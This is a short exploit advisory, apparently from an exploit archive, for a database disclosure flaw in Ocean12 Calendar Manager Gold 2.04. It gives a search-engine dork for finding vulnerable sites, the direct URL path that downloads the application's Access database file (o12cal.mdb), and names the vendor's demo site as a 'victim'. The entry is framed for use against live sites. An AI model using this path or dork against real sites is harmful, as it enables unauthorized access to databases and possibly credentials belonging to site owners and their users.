id: 4273
date: 11/27/2008
title: Ocean12 Calendar Manager Gold Database Disclosure Vulnerability
author: Pouya_Server
cves: 

===============================================================
Ocean12 Calendar Manager Gold Database Disclosure Vulnerability
===============================================================


#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Calendar Manager Gold
Version: 2.04
Vendor : http://ocean12tech.com/products/o12calgold
Dork: Maintained with the Ocean12 Calendar Manager Gold v2.04
Vulnerability : Database Disclosure Vulnerability
---------------------------------------------------------
#########################################################
http://site.com/path/o12cal.mdb

---------------------------------
Victem :
http://ocean12tech.com/products/o12calgold/demo



#  0day.today [2023-03-27]  #